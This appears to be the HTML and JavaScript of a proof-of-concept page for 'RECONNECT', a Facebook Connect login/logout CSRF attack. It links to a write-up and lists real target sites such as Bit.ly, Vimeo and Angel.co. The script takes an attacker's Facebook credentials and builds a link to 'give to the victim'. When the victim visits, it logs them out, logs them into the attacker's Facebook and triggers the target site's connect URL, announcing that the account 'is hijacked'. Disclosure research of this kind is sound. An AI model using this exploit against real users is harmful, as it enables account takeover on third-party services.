<img src="/img/reconnect.png">
<div id="info">

<p><a href="https://sakurity.com/blog/2015/03/05/RECONNECT.html">Read how it works.</a> Enter your Facebook credentials, <strong>do not use your real account</strong> (we do not store anything on the server side though), create a fake account instead:</p>
<p><input id="u" onchange="updateLink()" placeholder="attacker@gmail.com"> <input id="p" onchange="updateLink()"  placeholder="AttackerPassword"></p>

<p>Choose a popular website or enter the URL trigerring Facebook Connect manually. <strong>Now fixed:</strong> Booking.com </p> 
<p>
<script>
var pre = [{
  name: 'Bit.ly',
  connect: 'https://graph.facebook.com/oauth/authorize?scope=publish_stream%2Coffline_access%2Cemail&redirect_uri=https%3A%2F%2Fbitly.com%2Fa%2Fadd_facebook_account%3Frd%3D%252Fa%252Fsettings%252Fconnected&display=page&client_id=124707800885763',
  ico: 'https://bit.ly/favicon.ico'
},{
  name: 'About.me',
  connect: 'https://about.me/facebook/login/',
  ico: 'https://d2ed0w4q03gsmw.cloudfront.net/s3/assets/7bebd2f/images/icons/favicon.ico'
},{
  name: 'Stumbleupon',
  connect: 'https://www.stumbleupon.com/service/facebook/autoshare/request?success=%2Fsettings%2Fconnections%3F_notoolbar%26_nospa%3Dtrue&fail=%2Fsettings%2Fconnections%3F_notoolbar%26_nospa%3Dtrue&context=settings&scope=',
  ico: 'https://nb9-stumbleupon.netdna-ssl.com/-G-ChSR8MQAl3Skvq8oNZg'
},{
  name: 'Angel.co',
  disconnect:'https://angel.co/auth/facebook/destroy',
  connect:'https://angel.co/auth/facebook/with_callback?callback=%2Fsocial%2Fconnections%3Fprovider%3Dfacebook&sr=social',
  ico: 'https://angel.co/images/icons/angellist.ico'
},{
  name: "Mashable.com",
  connect: 'https://mashable.com/auth/facebook/',
  ico: 'https://rack.0.mshcdn.com/assets/favicon-f4f209c501a0902a12e1a674354bb356.png'
},{
  name: 'Vimeo',
  connect: 'https://vimeo.com/settings/apps?service=facebook&action=connect',
  ico: 'https://f.vimeocdn.com/images_v6/favicon_32.ico'
}
]


for(i=0;i<pre.length;i++){
  set = pre[i];
  document.write(" <a onclick='choose("+i+")'> <img style='max-height:16px' src='"+set.ico+"'> "+set.name+"</a> ");
}
</script>
</p>
<input id="init" onchange="updateLink()" style="width:100%" placeholder="https://example.com/oauth/facebook">

<p>Give this link to the victim</p>
<textarea id="link"></textarea>
</div>

<div id="exploit" style="display:none">
<p><button onclick="start()">Start RECONNECT</button></p>
<div id="console"></div>
</div>


<img id="logouter" style="display:none">
<script>
var logout_url = 'https://www.facebook.com/n/?mid=x46fdf8G5af4213825a3G0Gdx';
waitLogin = 4000;
waitLogout = 6000;

function getLoginUrl(u,p){
  return 'https://apps.facebook.com/482922061740192/?to=https%3A%2F%2Fwww.facebook.com%2Flogin.php%3Femail%3D'+encodeURIComponent(u)+'%26pass%3D'+encodeURIComponent(p);
}

function choose(i){
  document.getElementById("init").value = pre[i].connect;
  updateLink();
}

function updateLink(){
  var u = document.getElementById('u').value;
  var p = document.getElementById('p').value;
  var init = document.getElementById('init').value;

  document.getElementById("link").value = 'https://sakurity.com/reconnect#u='+encodeURIComponent(u)+'&p='+encodeURIComponent(p)+'&init='+encodeURIComponent(init)
}

function log(data){
  document.getElementById('console').innerHTML += "<br>"+data
}

function GET(url){
  img = document.getElementById('logouter')
  img.src = url;
}

function start(){
  GET(logout_url)
  log("Logging you out of Facebook");

  var hash = location.hash.slice(1);
  var u = decodeURIComponent(hash.match(/u=(.*?)(&|$)/)[1])
  var p = decodeURIComponent(hash.match(/p=(.*?)(&|$)/)[1])
  var init = decodeURIComponent(hash.match(/init=(.*?)(&|$)/)[1])
  x=window.open(getLoginUrl(u,p),'_blank','height=100,width=100');
  window.focus();
  log("Logging you in the attacker Facebook account");
  var domain = init.split('/')[2];

  setTimeout(function(){
    // user is logged in - trigger connect
    x.close();
    GET(init);
    log("Connecting spoofed attacker's facebook to your "+domain+" account");
  }, waitLogin);

  setTimeout(function(){
    // user is logged in - trigger connect
    GET(logout_url);
    log("Logging you out the attacker facebook. Your account on "+domain+" is hijacked.");
  }, waitLogout);

}


if(location.hash.length>0){
  document.getElementById('info').style.display = 'none'
  document.getElementById('exploit').style.display = 'inline';
}

</script>